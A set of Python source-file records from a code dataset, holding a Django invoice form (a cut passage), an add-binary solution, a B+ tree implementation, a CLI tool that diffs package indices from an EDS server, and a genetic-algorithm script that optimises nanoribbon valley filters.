None)\n\t\tself.inv = kwargs.pop('invoice_type', None) #kay di mag work anf cleaned_data.get('invoice_type') sa clean_hours\n\t\t#self.start = kwargs.pop('start_time', None)\n\t\t#self.end = kwargs.pop('end_time', None)\n\t\treturn super(InvoiceForm, self).__init__(*args, **kwargs)\n\n\tdef clean_amount(self):\n\t\t\n\t\tinvoice_type = self.cleaned_data.get('invoice_type')\n\t\tamount = self.cleaned_data.get('amount')\n\t\tif invoice_type == 'fixed':\n\t\t\tif not amount:\n\t\t\t\traise ValidationError(\"you pick fixed - amount should have a value\")\n\t\treturn amount\n\t\n\tdef clean_start_time(self):\n\t\tstart_time = self.cleaned_data.get('start_time')\n\t\treturn start_time\n\n\tdef clean_end_time(self):\n\t\tend_time = self.cleaned_data.get('end_time')\t\t\n\t\treturn end_time\n\n\tdef clean_rate(self):\n\t\thours = self.cleaned_data.get('hours')\n\t\trate = self.cleaned_data.get('rate')\n\t\tif rate:\n\t\t\tif not hours:\n\t\t\t\traise ValidationError(\"rate has value but doest have an hour/s\")\n\t\tif not rate and hours:\n\t\t\traise ValidationError(\"hours has value and rate must have value too\")\n\t\treturn rate\n\n\tdef clean_order_number(self):\n\t\tor_no = self.cleaned_data.get('order_number')\n\t\tif or_no:\n\t\t\ttext_or_no = Invoice.objects.filter(order_number__exact=or_no)\n\t\t\tif text_or_no:\n\t\t\t\traise ValidationError(\"Order Number already exists:\")\n\t\treturn or_no\n\n\tdef clean_invoice_number(self):\n\t\tinv_no = self.cleaned_data.get('invoice_number')\n\t\tif inv_no:\n\t\t\ttest_inv_no = Invoice.objects.filter(invoice_number__exact=inv_no)\n\t\t\tif test_inv_no:\n\t\t\t\traise ValidationError(\"Invoice Number already exists:\")\t\t\t\t\t\t\n\t\treturn inv_no\t\n\n\tdef clean_invoice_date(self):\n\t\tin_date = self.cleaned_data.get('invoice_date')\n\t\tif in_date:\n\t\t\tin_date = datetime.datetime.strftime( in_date, '%Y-%m-%d')\n\t\t\tcurrent = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')\n\t\t\tif current > in_date:\n\t\t\t\traise ValidationError(\"Datetime should be in future\")\n\t\treturn in_date\n\n\tdef clean_due_date(self):\n\t\tdue_date =  self.cleaned_data.get('due_date')\n\t\tif due_date:\n\t\t\tdue_date = datetime.datetime.strftime( due_date, '%Y-%m-%d')\n\t\t\tcurrent = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')\n\t\t\tif 
current > due_date:\n\t\t\t\traise ValidationError(\"Datetime should be in future\")\n\t\treturn due_date\n\n\tdef clean_hours(self):\n\t\t#import pdb; pdb.set_trace()\n\t\tinvoice_type = self.inv\n\t\thours = self.cleaned_data.get('hours')\n\t\tstart_time = self.cleaned_data.get('start_time')\n\t\tend_time = self.cleaned_data.get('end_time')\n\t\tif invoice_type == 'fixed':\n\t\t\tstart_time = self.cleaned_data.get('start_time')\n\t\t\tend_time = self.cleaned_data.get('end_time')\n\t\tif invoice_type == 'hourly':\n\t\t\tstart_time = self.data['start_time']\n\t\t\tend_time = self.data['end_time']\n\n\t\trate = self.cleaned_data.get('rate')\n\t\t\n\t\tif invoice_type == 'hourly':\n\t\t\tif hours:\n\t\t\t\tif start_time == '' or end_time == '':\t\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tstart_time = parse(start_time).time()\n\t\t\t\t\tend_time = parse(end_time).time()\n\t\t\t\tif start_time and end_time:\n\t\t\t\t\ttime_interval = datetime.datetime.combine(date.today(),end_time) - datetime.datetime.combine(date.today(),start_time)\n\t\t\t\t\ttime_interval = int(time_interval.seconds/3600)\n\t\t\t\t\tif str(time_interval) != str(hours):\n\t\t\t\t\t\traise ValidationError(\"hours should equal to the time interval between start_time and end_time\")\n\t\t\tif not hours:\n\t\t\t\traise ValidationError(\"you pick hourly - hours must have a value\")\n\t\treturn hours\n\n\tdef save(self, commit=True):\n\t\tinstance = super(InvoiceForm, self).save(commit=False)\n\t\t#import pdb; pdb.set_trace()\n\t\tinvoice_type = self.cleaned_data.get('invoice_type')\n\t\tamount = self.cleaned_data.get('amount')\n\t\thours = self.cleaned_data.get('hours')\n\t\tstart_time = self.cleaned_data.get('start_time')\n\t\tend_time = self.cleaned_data.get('end_time')\n\t\trate = self.cleaned_data.get('rate')\n\n\t\tif invoice_type == 'fixed':\n\t\t\tinstance.amount = amount\n\t\t\tinstance.hours = None\n\t\t\tinstance.start_time = None\n\t\t\tinstance.end_time = None\n\t\t\tinstance.rate = None\n\t\t\tinstance.total_amount = amount- instance.paid\n\t\telif invoice_type == 'hourly' :\n\t\t\tinstance.amount = None\n\t\t\tinstance.hours = hours\n\t\t\tinstance.rate = rate\n\t\t\tinstance.start_time = start_time\n\t\t\tinstance.end_time = end_time\n\t\t\tinstance.total_amount = (hours*rate)\n\t\tinstance.owner = self.user\n\t\tif commit:\n\t\t\tinstance.save()\n\t\treturn instance\n\n\nclass InvoiceEmailForm(Form):\n\tsubject = CharField(max_length=100, required=True)\n\ttext = CharField(max_length=255, required=True)\n\n\n\tclass Meta:\n\t\tfields = ('subject','text')\n\n\tdef clean_subject(self):\n\t\tsubject = self.cleaned_data['subject']\n\t\tif not subject:\n\t\t\traise ValidationError(\"This is required\")\n\t\treturn subject\n\n\tdef clean_text(self):\n\t\ttext = self.cleaned_data['text']\n\t\tif not text:\n\t\t\traise ValidationError(\"This is required\")\n\t\treturn text\n\n\n","sub_path":"invoices/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"117713249","text":"class Solution:\n    def addBinary(self, a: str, b: str) -> str:\n        n_a = len(a)\n        n_b = len(b)\n        long_s, short_s = (a,b) if n_a>=n_b else (b,a)\n        out = []\n        remain = 0\n        for i in range(-1,-len(short_s)-1,-1):\n            remain,val = divmod(remain+int(long_s[i])+int(short_s[i]),2)\n            out.append(str(val))\n        for i in range(-len(short_s)-1,-len(long_s)-1,-1):\n            remain,val = divmod(remain+int(long_s[i]),2)\n            out.append(str(val))\n        if remain==1:\n            out.append(str(1))\n        out.reverse()\n        return \"\".join(out)\n\n","sub_path":"Problem67_Add_Binary.py","file_name":"Problem67_Add_Binary.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"248216366","text":"\"\"\"Simple implementation of a B+ tree, a self-balancing tree data structure that (1) maintains sort\ndata order and (2) allows insertions and access in logarithmic time.\n\"\"\"\n\nclass Node(object):\n    \"\"\"Base node object.\n\n    Each node stores keys and values. Keys are not unique to each value, and as such values are\n    stored as a list under each key.\n\n    Attributes:\n        order (int): The maximum number of keys each node can hold.\n    \"\"\"\n    def __init__(self, order):\n        \"\"\"Child nodes can be converted into parent nodes by setting self.leaf = False. Parent nodes\n        simply act as a medium to traverse the tree.\"\"\"\n        self.order = order\n        self.keys = []\n        self.values = []\n        self.leaf = True\n\n    def add(self, key, value):\n        \"\"\"Adds a key-value pair to the node.\"\"\"\n        # If the node is empty, simply insert the key-value pair.\n        if not self.keys:\n            self.keys.append(key)\n            self.values.append([value])\n            return None\n\n        for i, item in enumerate(self.keys):\n            # If new key matches existing key, add to list of values.\n            if key == item:\n                self.values[i].append(value)\n                break\n\n            # If new key is smaller than existing key, insert new key to the left of existing key.\n            elif key < item:\n                self.keys = self.keys[:i] + [key] + self.keys[i:]\n                self.values = self.values[:i] + [[value]] + self.values[i:]\n                break\n\n            # If new key is larger than all existing keys, insert new key to the right of all\n            # existing keys.\n            elif i + 1 == len(self.keys):\n                self.keys.append(key)\n                self.values.append([value])\n\n    def split(self):\n        \"\"\"Splits the node into two and stores them as child nodes.\"\"\"\n        left = Node(self.order)\n        right = Node(self.order)\n        mid = self.order // 2\n\n        left.keys = self.keys[:mid]\n        left.values = self.values[:mid]\n\n        right.keys = self.keys[mid:]\n        right.values = self.values[mid:]\n\n        # When the node is split, set the parent key to the left-most key of the right child node.\n        self.keys = [right.keys[0]]\n        self.values = [left, right]\n        self.leaf = False\n\n    def is_full(self):\n        \"\"\"Returns True if the node is full.\"\"\"\n        return len(self.keys) == self.order\n\n    def show(self, counter=0):\n        \"\"\"Prints the keys at each level.\"\"\"\n        print(counter, str(self.keys))\n\n        # Recursively print the key of child nodes (if these exist).\n        if not self.leaf:\n            for item in self.values:\n                item.show(counter + 1)\n\nclass BPlusTree(object):\n    \"\"\"B+ tree object, consisting of nodes.\n\n    Nodes will automatically be split into two once it is full. 
When a split occurs, a key will\n    'float' upwards and be inserted into the parent node to act as a pivot.\n\n    Attributes:\n        order (int): The maximum number of keys each node can hold.\n    \"\"\"\n    def __init__(self, order=8):\n        self.root = Node(order)\n\n    def _find(self, node, key):\n        \"\"\" For a given node and key, returns the index where the key should be inserted and the\n        list of values at that index.\"\"\"\n        for i, item in enumerate(node.keys):\n            if key < item:\n                return node.values[i], i\n\n        return node.values[i + 1], i + 1\n\n    def _merge(self, parent, child, index):\n        \"\"\"For a parent and child node, extract a pivot from the child to be inserted into the keys\n        of the parent. Insert the values from the child into the values of the parent.\n        \"\"\"\n        parent.values.pop(index)\n        pivot = child.keys[0]\n\n        for i, item in enumerate(parent.keys):\n            if pivot < item:\n                parent.keys = parent.keys[:i] + [pivot] + parent.keys[i:]\n                parent.values = parent.values[:i] + child.values + parent.values[i:]\n                break\n\n            elif i + 1 == len(parent.keys):\n                parent.keys += [pivot]\n                parent.values += child.values\n                break\n\n    def insert(self, key, value):\n        \"\"\"Inserts a key-value pair after traversing to a leaf node. If the leaf node is full, split\n        the leaf node into two.\n        \"\"\"\n        parent = None\n        child = self.root\n\n        # Traverse tree until leaf node is reached.\n        while not child.leaf:\n            parent = child\n            child, index = self._find(child, key)\n\n        child.add(key, value)\n\n        # If the leaf node is full, split the leaf node into two.\n        if child.is_full():\n            child.split()\n\n            # Once a leaf node is split, it consists of a internal node and two leaf nodes. 
These\n            # need to be re-inserted back into the tree.\n            if parent and not parent.is_full():\n                self._merge(parent, child, index)\n\n    def retrieve(self, key):\n        \"\"\"Returns a value for a given key, and None if the key does not exist.\"\"\"\n        child = self.root\n\n        while not child.leaf:\n            child, index = self._find(child, key)\n\n        for i, item in enumerate(child.keys):\n            if key == item:\n                return child.values[i]\n\n        return None\n\n    def show(self):\n        \"\"\"Prints the keys at each level.\"\"\"\n        self.root.show()\n\ndef demo_node():\n    print('Initializing node...')\n    node = Node(order=4)\n\n    print('\\nInserting key a...')\n    node.add('a', 'alpha')\n    print('Is node full?', node.is_full())\n    node.show()\n\n    print('\\nInserting keys b, c, d...')\n    node.add('b', 'bravo')\n    node.add('c', 'charlie')\n    node.add('d', 'delta')\n    print('Is node full?', node.is_full())\n    node.show()\n\n    print('\\nSplitting node...')\n    node.split()\n    node.show()\n\ndef demo_bplustree():\n    print('Initializing B+ tree...')\n    bplustree = BPlusTree(order=4)\n\n    print('\\nB+ tree with 1 item...')\n    bplustree.insert('a', 'alpha')\n    bplustree.show()\n\n    print('\\nB+ tree with 2 items...')\n    bplustree.insert('b', 'bravo')\n    bplustree.show()\n\n    print('\\nB+ tree with 3 items...')\n    bplustree.insert('c', 'charlie')\n    bplustree.show()\n\n    print('\\nB+ tree with 4 items...')\n    bplustree.insert('d', 'delta')\n    bplustree.show()\n\n    print('\\nB+ tree with 5 items...')\n    bplustree.insert('e', 'echo')\n    bplustree.show()\n\n    print('\\nB+ tree with 6 items...')\n    bplustree.insert('f', 'foxtrot')\n    bplustree.show()\n\n    print('\\nRetrieving values with key e...')\n    print(bplustree.retrieve('e'))\n\nif __name__ == '__main__':\n    demo_node()\n    print('\\n')\n    demo_bplustree()","sub_path":"ADSAA/SelfPrintableBplusTree.py","file_name":"SelfPrintableBplusTree.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
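The record above already ships its own demo functions; the short sketch below is an editor's addition (the import path is an assumption based on the record's file name) highlighting the two behaviors the docstrings call out: duplicate keys accumulate values in a list, and `retrieve` returns `None` for missing keys.

```python
# Sketch only: exercises the BPlusTree defined above. The module name
# SelfPrintableBplusTree is assumed from the record's sub_path.
from SelfPrintableBplusTree import BPlusTree

tree = BPlusTree(order=4)
tree.insert('a', 'alpha')
tree.insert('a', 'aleph')    # duplicate key: the value is appended, not replaced
tree.insert('b', 'bravo')

print(tree.retrieve('a'))    # ['alpha', 'aleph']
print(tree.retrieve('z'))    # None (key not present)
```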
+{"seq_id":"20866743","text":"# (C) Copyright 2018 Enthought, Inc., Austin, TX\n# All rights reserved.\n#\n\"\"\"\nBrood-diff is a CLI for calculating the diff between two given brood indices.\n\nThis is useful when determining what is required to sync a customer's\nair-gapped brood instance with the Enthought brood, and is a replacement to\nthe old method of requiring an entire hatcher export of the Enthought brood.\n\nUsage:\n    Get Index:\n    Use this function to generate the json representation of a brood index\n\n    python diff.py get-index -u \n                                   -r \n                                   -p \n                                   -v \n                                   -o \n\n    Index Diff:\n    Use this function to calculate the difference between two brood indices.\n    python diff.py gen-diff -l \n                            -r \n                            -o \n\n\"\"\"\nimport json\nimport sys\nfrom typing import Iterable, NoReturn, Tuple, Union\n\nimport click\nimport requests\n\nfrom brood_diff import valid\n\n\nINDEX_ROUTE = \"api/v1/json/indices\"\nLEGACY_INDEX_ROUTE = \"api/v0/json/indices\"\n\n\n@click.group()\ndef cli():\n    \"\"\" Brood diff is a CLI tool for calculating the difference between\n    two different EDS indices.\n    \"\"\"\n    pass\n\n\n# CLI wrappers #\n\n\n@cli.command(name=\"get-index\")\n@click.option('--url', '-u', type=str,\n              help=\" Must include http or https as needed\")\n@click.option('--repository', '-r', type=str, callback=valid.validate_org_repo,\n              help=(\" Must be in EDS/Hatcher format: `org/repo`\"\n                    \"\\ne.g. enthought/free\"))\n@click.option('--platform', '-p', type=str, callback=valid.validate_platform,\n              help=\" See list-platforms for supported platforms\")\n@click.option('--version', '-v', type=str, callback=valid.validate_version,\n              help=(\" See list-versions for \"\n                    \"supported python version tags\"))\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\n@click.option('--sort/--no-sort', default=True,\n              help=(\"Set whether the output should be sorted.\"\n                    \"\\nDefault: --sort\"))\n@click.option('--legacy/--no-legacy', default=False,\n              help=(\"Use --legacy for the legacy v0 api version. Note, this \"\n                    \"should be used only in special circumstances.\"\n                    \"\\nDefault: --no-legacy\"))\ndef cli_get_index(url, repository, platform, version, output, sort, legacy):\n    \"\"\" Get index for a given repo/platform/python-tag from EDS instance\n    located at url specified by -u/--url and write output to file\n    specified by -o/--output.\"\"\"\n\n    org, repo = repository.split(\"/\")\n\n    idx = get_index(url,\n                    org,\n                    repo,\n                    platform,\n                    version,\n                    legacy)\n    click.echo(\"Writing output to json sort={} ...\".format(sort))\n    to_json_file(idx, output, sort=sort)\n\n\n@cli.command(name='full-index')\n@click.option('--url', '-u', type=str,\n              help=\" Must include http or https as needed\")\n@click.option('--repository', '-r', multiple=True, type=str,\n              callback=valid.validate_org_repos,\n              help=(\" Must be in EDS/Hatcher format: `org/repo`\"\n                    \"\\ne.g. 
enthought/free\"))\n@click.option('--platform', '-p', multiple=True, type=str,\n              callback=valid.validate_platforms,\n              help=\" See list-platforms for supported platforms\")\n@click.option('--version', '-v', multiple=True, type=str,\n              callback=valid.validate_versions,\n              help=(\" See list-versions for \"\n                    \"supported python version tags\"))\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\n@click.option('--sort/--no-sort', default=True,\n              help=(\"Set whether the output should be sorted.\"\n                    \"\\nDefault: --sort\"))\n@click.option('--legacy/--no-legacy', default=False,\n              help=(\"Use --legacy for the legacy v0 api version. Note, this \"\n                    \"should be used only in special circumstances.\"\n                    \"\\nDefault: --no-legacy\"))\ndef cli_get_full_index(url, repository, platform, version, output, sort,\n                       legacy):\n    \"\"\" Get full json representation of multiple EDS indices from an EDS\n    instance specified by -u/--url for potentially multiple platforms,\n    repositories, and python versions, and output the full index as a single\n    json file specified by -o/--output.\"\"\"\n\n    gen_full_index(url,\n                   repository,\n                   platform,\n                   version,\n                   output,\n                   sort,\n                   legacy)\n\n\n@cli.command(name=\"gen-diff\")\n@click.option('--local', '-l', type=str,\n              help=\" Full path to json file for local index\")\n@click.option('--remote', '-r', type=str,\n              help=\" Full path to json file for remote index\")\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\ndef cli_gen_diff(local, remote, output):\n    \"\"\" Calculate the difference between two EDS indices and output the\n    result as a json file.\n\n    Note, the terminology used is from the perspective of the EDS end-user.\n\n    Thus the local index represents the index you wish to compare to the\n    remote (Enthought) index.\n\n    Example Use Case:\n\n    End-user runs get-index on their local EDS to generate the index of\n    their enthought/free repo as a json file: local.json.\n\n    Next, run the same command against the Brood production server to generate\n    the index of our enthought/free repo as a json file: remote.json.\n\n    Finally run python diff.py gen-diff -l local.json -r remote.json -o\n    output_file.json\n    \"\"\"\n    local_index = from_json_file(local)\n    remote_index = from_json_file(remote)\n    diff = index_diff(local_index, remote_index)\n    to_json_file(diff, output)\n\n\n@cli.command(name=\"full-diff\")\n@click.option('--local', '-l', type=str,\n              help=\" Full path to json file for local index\")\n@click.option('--repository', '-r', multiple=True, type=str,\n              callback=valid.validate_org_repos,\n              help=(\" Must be in EDS/Hatcher format: `org/repo`\"\n                    \"\\ne.g. 
enthought/free\"))\n@click.option('--platform', '-p', multiple=True, type=str,\n              callback=valid.validate_platforms,\n              help=\" See list-platforms for supported platforms\")\n@click.option('--version', '-v', multiple=True, type=str,\n              callback=valid.validate_versions,\n              help=(\" See list-versions for \"\n                    \"supported python version tags\"))\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\n@click.option('--sort/--no-sort', default=True,\n              help=(\"Set whether the output should be sorted.\"\n                    \"\\nDefault: --sort\"))\n@click.option('--legacy/--no-legacy', default=False,\n              help=(\"Use --legacy for the legacy v0 api version. Note, this \"\n                    \"should be used only in special circumstances.\"\n                    \"\\nDefault: --no-legacy\"))\ndef cli_full_diff(local, repository, platform,\n                  version, output, sort, legacy=False):\n    \"\"\" Given a local index son file, calculate the difference between that\n    index and the Enthought production EDS repos specified by the repo,\n    platform, and version options.\n\n    The output is a single json file containing the missing packages.\n    \"\"\"\n    full_diff(local,\n              repository,\n              platform,\n              version,\n              output,\n              sort,\n              legacy)\n\n\n@cli.command(name=\"list-platforms\")\ndef list_platforms():\n    \"\"\" List valid input for platform option.\"\"\"\n    click.echo(\"Valid Platforms:\")\n    for plat in sorted(valid.PLATS):\n        click.echo(plat)\n\n\n@cli.command(name=\"list-versions\")\ndef list_versions():\n    \"\"\" List valid input for version option.\"\"\"\n    click.echo(\"Valid Python Version tags:\")\n    for ver in sorted(valid.VERS):\n        click.echo(ver)\n\n\n# tested functions #\n\n\ndef get_index(url: str, org: str, repo: str, plat: str, pyver: str,\n              legacy: bool = False) -> Union[dict, NoReturn]:\n    \"\"\" Fetch index for a given repo/platform/python-tag.\"\"\"\n    if legacy:\n        resource = \"/\".join((url, LEGACY_INDEX_ROUTE,\n                             org, repo, plat, pyver, \"eggs\"))\n    else:\n        resource = \"/\".join((url, INDEX_ROUTE, org, repo, plat, pyver, \"eggs\"))\n    print(\"Requesting {} ...\".format(resource))\n    r = requests.get(resource)\n    if r.status_code == 200:\n        return r.json()\n    elif r.status_code in (400, 404):\n        # incorrect base url raises ConnectionError and plat and ver get\n        # validated via CLI - thus 404 likely indicates problem with org/repo.\n        print(\"HTTP 404 Error: Please double check your Repository settings.\")\n        print(\"Repository must be a valid org/repo combination.\")\n        r.raise_for_status()\n        sys.exit()\n    elif r.status_code in (500, 502, 503, 504):  # Brood internal errors\n        msg = \"HTTP 50* Error: Please verify that the EDS instance is up at {}\"\n        print(msg.format(url))\n        r.raise_for_status()\n        sys.exit()\n\n\ndef gen_full_index(url: str, org_repos: Tuple[str], plats: Tuple[str],\n                   pyvers: Tuple[str], output: str, sort: bool = True,\n                   legacy: bool = False) -> None:\n    \"\"\" Given a set of org/repo, platforms, and versions, generate a single\n    json file containing the entirety of the index representing these repos.\n\n    The most common usecase would 
be to collect the full index of the\n    end-user's enthought/free + enthought/gpl and potentially also\n    enthought/lgpl repos.\n    \"\"\"\n    full_index = {}\n    for org_repo in org_repos:\n        org, repo = org_repo.split(\"/\")\n        for plat in plats:\n            for ver in pyvers:\n                full_index.update(get_index(url,\n                                            org,\n                                            repo,\n                                            plat,\n                                            ver,\n                                            legacy))\n    to_json_file(full_index, output, sort=sort)\n\n\ndef index_diff(local_index: dict, remote_index: dict) -> dict:\n    \"\"\" Calculate the difference between two json brood indices.\n    Adapted from brood/brood/sync/egg_sync.py\n\n    Calculations for eggs to delete are omitted:\n    unless the user specifically requests that we remove unused or outdated eggs,\n    we should make minimal changes to their local EDS instance.\n\n    Likewise, calculations for eggs to move are omitted.\n    \"\"\"\n    local_index_set = set(local_index)\n    remote_index_set = set(remote_index)\n\n    missing_egg_names = remote_index_set - local_index_set\n    missing_egg_index = {key: remote_index[key]\n                         for key in missing_egg_names}\n\n    return {\"missing\": missing_egg_index}\n\n\ndef full_diff(local_idx_json: str, org_repos: Tuple[str],\n              plats: Tuple[str], vers: Tuple[str],\n              output: str,\n              sort: bool = True,\n              legacy: bool = False,\n              remote_url: str = \"https://packages.enthought.com\"):\n    \"\"\" Given a set of org/repo/plat/ver, a local index file and a remote EDS\n    host, calculate the full index diff and write it to the json file\n    specified by the output parameter.\n\n    remote_url is left as an internally available parameter but not exposed\n    via the cli - in general we will target the enthought production url.\n    \"\"\"\n    local_idx = from_json_file(local_idx_json)\n    remote_idx = {}\n    for org_repo in org_repos:\n        for plat in plats:\n            for ver in vers:\n                org, repo = org_repo.split(\"/\")\n                remote_idx.update(get_index(remote_url,\n                                            org,\n                                            repo,\n                                            plat,\n                                            ver,\n                                            legacy))\n    diff = index_diff(local_idx, remote_idx)\n    to_json_file(diff, output, sort=sort)\n\n\ndef to_json_file(idx: dict, path: str, sort: bool = False) -> None:\n    \"\"\" Write the index to file as json.\"\"\"\n    with open(path, 'w') as f:\n        json.dump(idx, f, sort_keys=sort)\n\n\ndef from_json_file(path: str) -> dict:\n    \"\"\" Read an index from a json file.\"\"\"\n    with open(path, 'r') as f:\n        return json.loads(f.read())\n\n\ndef merge_json(input_paths: Iterable[str], output) -> None:\n    \"\"\" Given a list of paths to json indices, merge them into one json file.\"\"\"\n    index = {}\n    for path in input_paths:\n        index.update(from_json_file(path))\n    to_json_file(index, output, sort=True)\n\n\nif __name__ == '__main__':\n    cli()\n","sub_path":"brood_diff/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":13169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
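A toy illustration of the core of diff.py (assuming the brood_diff package is importable): `index_diff` keys the comparison on egg names and reports only the eggs the local index lacks, so a sync never asks the local instance to delete anything.

```python
# Toy indices; real values would be full egg metadata dicts.
from brood_diff.diff import index_diff

local = {"numpy-1.16.1-1.egg": {"sha256": "aaa"}}
remote = {"numpy-1.16.1-1.egg": {"sha256": "aaa"},
          "scipy-1.2.0-1.egg": {"sha256": "bbb"}}

print(index_diff(local, remote))
# {'missing': {'scipy-1.2.0-1.egg': {'sha256': 'bbb'}}}
```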
+{"seq_id":"72993150","text":"#!/usr/bin/env python\n\n\nfrom qmt.system import Structure\nfrom qmt.generator import Generator\nfrom qmt.ga import GA\nfrom qmt.serializer import Serializer\nfrom qmt.parser import Parser\nfrom qmt.timer import Timer\nfrom qmt.parser import Parser\n\nimport numpy as np\nimport os\n\nimport multiprocessing\nfrom pathos.multiprocessing import ProcessingPool as Pool\n\nimport coloredlogs, verboselogs\nimport copy\nimport matplotlib.pyplot as plt\nimport pickle\n\n# create logger\ncoloredlogs.install(level='INFO')\n\nlogger = verboselogs.VerboseLogger('qmt::runner ')\n\n# def threadedCall(structure, lead0, lead1):\n#     return structure.getCurrent(lead0, lead1, avg_chem_pot=2.7)\n\ndef getConductances(structure, lead0, lead1):\n    return structure.getValleyPolarizedCurrent(lead0, lead1)\n\ndef getNewStructure(parser, identifier):\n    return Structure(parser, identifier, [[identifier]])\n\ndef objectiveFunction(currents_0_1):\n    vectors = []\n    for v1 in currents_0_1:\n        vectors.append((np.abs((v1[1]) / (v1[0] + v1[1])), (np.abs((v1[0] + v1[1]) / v1[0]))))\n\n    data = np.array(vectors).reshape(len(vectors), 2)\n\n    return data\n\ndef main():\n    total_timer = Timer()\n    iteration_timer = Timer()\n    short_timer = Timer()\n    total_timer.start()\n\n    logger.success(' --- Welcome to the Kwantum Transmission Device Optimizer --- ')\n\n    parser = Parser()\n    pool = Pool(nodes=parser.config['n_cpus'])\n    logger.info('Running calculations with ' + str(parser.config['n_cpus']) + ' workers.')\n    \n    serializer = Serializer(parser)\n    ga = serializer.deserialize()\n    if ga is not None:\n        # continue from before\n        ga.resetParser(parser)\n        logger.success('Successfully loaded previous GA. Will continue previous calculation.')\n    else:\n        logger.info('GA starting from scratch.')\n        logger.info('Generating initial structures...')\n        short_timer.start()\n\n        \n        ga = GA(parser, objective_function=objectiveFunction)\n        structures = ga.generator.generateAll(pool=pool, seeds=np.random.randint(0, 2**32 - 1, parser.config['GA']['n_structures']))\n        ga.setNextGeneration(structures)\n        logger.success('Initial structures generated. 
Elapsed time: %s' % (short_timer.stop()))\n\n    #########################\n    # main loop here\n    #########################\n\n\n    while ga.generationNumber() < parser.getNIterations():\n\n        short_timer.start()\n        iteration_timer.start()\n        # print info about the upcoming calculation\n        ga.summarizeGeneration()\n\n        # get the structures we are going to run calculations on\n        structures = ga.getCurrentGeneration()\n\n        # plot the systems and save image to disk\n\n        try:\n            os.mkdir('output/gen_' + str(ga.generationNumber()).zfill(3))\n        except FileExistsError:\n            pass\n\n        for i, s in enumerate(structures):\n            s.visualizeSystem(args={'dpi': 600, 'file': 'output/' + 'gen_' + str(ga.generationNumber()).zfill(3) + '/gen_%03i_struct_%03i.png' % (ga.generationNumber(), i)})\n\n        # calculate currents and write them out to disk\n        currents_0_1 = pool.map(getConductances, structures, [0] * len(structures), [1] * len(structures))\n        \n        with open('output/currents_gen_' + str(ga.generationNumber()).zfill(3) + '.dat', 'w') as cf:\n            cf.write('# Currents (lead1-k\\', lead1-k)\\n')\n            for cs1 in currents_0_1:\n                cf.write('%0.20e\\t%0.20e\\n' % (cs1[0], cs1[1]))\n\n        # calculate the objective function\n        ga.calculate([currents_0_1])\n\n        structures = ga.rankGenerationWithSquare()\n        # for s, objs in zip(structures, ga.current_objectives):\n        #     print(s.identifier, objs)\n        logger.success('Calculations finished. Elapsed time: %s' % (short_timer.stop()))\n        # write gene variables and objective function parameters to file\n        ga.writePhaseSpace(structures)\n\n        ga.serializeStructures()\n\n\n        short_timer.start()\n        subset_limit = parser.config['GA']['random-step']['keep-best']\n        structures_subset = structures[:subset_limit]\n        new_structures = []\n        for i in range(len(structures) - subset_limit):\n            index = np.random.randint(subset_limit)\n            new_structures.append(structures_subset[index])\n        \n        # mutate the current generation\n        structures_modified = ga.generator.mutateAll(new_structures, pool=pool, seeds=np.random.randint(0, 2**32 - 1, len(new_structures)))\n\n        structures = structures_subset + structures_modified\n\n        ga.setNextGeneration(structures)\n        logger.success('Structures have been updated. Elapsed time: %s' % (short_timer.stop()))\n        # print how long it took and serialize the current GA\n        short_timer.start()\n        serializer.serialize(ga)\n        pickle.dump(ga.history, open('output/history.pkl', 'wb'))\n        logger.success('Generation %i completed. Elapsed time: %s' % (ga.generationNumber(), iteration_timer.stop()))\n\n    logger.success(' --- Elapsed time: %s ---' % (total_timer.stop()))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"optimizeValleyFilter2LeadNanoribbon.py","file_name":"optimizeValleyFilter2LeadNanoribbon.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
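To see what the script's `objectiveFunction` actually computes, here is a standalone check with the function copied (lightly condensed) from the record so it runs without the qmt stack: each current pair `(c0, c1)` maps to `(|c1/(c0+c1)|, |(c0+c1)/c0|)`, stacked into an `(n, 2)` array.

```python
import numpy as np

# Copied from the script above so it can run in isolation.
def objectiveFunction(currents_0_1):
    vectors = []
    for v1 in currents_0_1:
        vectors.append((np.abs((v1[1]) / (v1[0] + v1[1])), (np.abs((v1[0] + v1[1]) / v1[0]))))
    return np.array(vectors).reshape(len(vectors), 2)

data = objectiveFunction([(0.2, 0.8), (0.5, 0.5)])
print(data)          # [[0.8 5. ]
                     #  [0.5 2. ]]
print(data.shape)    # (2, 2)
```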
